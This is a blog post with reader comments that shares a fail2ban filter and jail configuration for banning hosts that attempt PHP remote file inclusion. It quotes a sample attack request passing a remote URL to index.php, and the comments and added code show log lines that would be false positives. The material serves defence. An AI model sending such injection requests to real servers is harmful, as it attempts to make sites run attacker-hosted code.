Fail2ban filter for PHP Injection attacks

Aren’t you just tired of the massive amount of PHP Remote Injection attacks registered in your access log? You know, the ones that look like this:

GET /index.php?n=http://eatmyfood.hostinginfive.com/pizza.htm?

Even if you secure your webserver, and set allow_url_fopen = false in php.ini, the attack is still annoying.

Just make sure you save this file to your /etc/fail2ban/filter.d directory, then add this block to jail.conf and restart fail2ban:

[php-url-fopen]

enabled = true
port    = http,https
filter  = php-url-fopen
logpath = /var/www/*/logs/access_log
maxretry = 1

And done 🙂
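The filter file itself is not shown above, so here is an added illustration (my own code, not the post's filter or fail2ban's) of the matching logic such a filter needs: the regex anchors on the request line and stops at its closing quote, so a URL that appears only in the Referer field, like the Google Images and externalredirect.php hits raised in the comments, is not treated as an attack. The regex and the log lines are constructed assumptions for this example; in a real fail2ban filter the host group is written as `<HOST>`.

```python
import re

# Match only the request line: the pattern must reach ` HTTP/x.y"` before any
# later quoted field, so a URL sitting in the Referer cannot satisfy it.
# Assumption: this regex is illustrative, not the one from the post's filter.
FAILREGEX = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?:GET|POST|HEAD) \S*\.php\?[^" ]*=(?:https?|ftp)://[^" ]* HTTP/[\d.]+"'
)


def matches(line):
    """Return the client IP when the request line passes a remote URL to a .php script."""
    m = FAILREGEX.match(line)
    return m.group('host') if m else None


# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    # the attack shape from the post: a remote URL injected into index.php?n=
    '203.0.113.7 - - [20/Jul/2009:06:13:02 +0200] '
    '"GET /index.php?n=http://eatmyfood.hostinginfive.com/pizza.htm? HTTP/1.1" 404 512 "-" "Mozilla/4.0"',
    # legitimate hit whose URL appears only in the Referer (the Google Images case)
    '198.51.100.9 - - [20/Jul/2009:06:13:02 +0200] '
    '"GET /xxx/index.html HTTP/1.1" 200 9398 '
    '"http://images.google.es/imgres?imgurl=http://www.example.com/img.jpg" "Mozilla/5.0"',
    # legitimate hit whose Referer contains .php?url=http:// (the externalredirect.php case)
    '192.0.2.5 - - [10/Jun/2011:15:20:39 +0200] '
    '"GET /forums/cron.php?rand=1307712039 HTTP/1.1" 200 352 '
    '"http://domain.net/forums/externalredirect.php?url=http://foo.com" "Mozilla/5.0"',
]


def offenders(lines):
    """IPs that would be banned: only the request-line injection, not the Referer hits."""
    return [ip for ip in (matches(l) for l in lines) if ip]
```

Running `offenders(SAMPLE_LOG)` returns only the first IP; the two Referer-only lines are ignored.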

About Buanzo

What do I know!
This entry was posted in General.

6 responses to Fail2ban filter for PHP Injection attacks

  1. fasuto said:

    I think that with your regular expression you also ban legitimate entries where .php?n=http://****
    appears in the REFERER.
    For example, the entries that come from Google Images or from banners:

    xxx.xxx.xxx.xxx - - [20/Jul/2009:06:13:02 +0200] "GET /xxx/index.html HTTP/1.1" 200 9398 "http://images.google.es/imgres?imgurl=http://www.xxxx.com/xy/imagenes/img.jpg&imgrefurl=http://www.xxxx.com/xy/index.htnl&usg=__pCH0q6sy06ssIsB4zJu_YYsqNZE=&h=163&w=227&sz=44&hl=es&start=2&um=1&tbnid=hjOK7M4WBtfFHM:&tbnh=78&tbnw=108&prev=/images%3Fq%3Dpunto%2Boro%26hl%3Des%26client%3Dfirefox-a%26rls%3Dorg.mozilla:es-ES:official%26sa%3DG%26um%3D1" "Mozilla/5.0 (Windows; U; Windows NT 6.0; es-ES; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)"

  2. Pingback: Ted Roche’s weblog » Adding Fail2Ban to the web site

  3. watt said:

    I’m on ubuntu 8.04 and don’t have any log files in var/www/ folder. What should I replace it with?

  4. sagichnich said:

    Nice feature, thank you. However, one needs to activate the "action" part or fail2ban won't start.

    Apache logs on Red Hat based systems lie at /var/log/httpd/access_log

    [php-url-fopen]

    enabled = true
    #port = http,https
    filter = php-url-fopen
    logpath = /var/log/httpd/access_log
    maxretry = 1
    action = iptables-multiport[name=PHP-fopen, port="http,https", protocol=tcp]

  5. Bharath said:

    I love this feature, can someone help me with the ignore regex for the following log entries

    xxx.xxx.xxx.xxx - - [10/Jun/2011:15:20:39 +0200] "GET /forums/cron.php?rand=1307712039 HTTP/1.1" 200 352 "http://domain.net/forums/externalredirect.php?url=http://foo.com" "Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1"

  6. Pingback: Xulen | Julián Fernández | blog
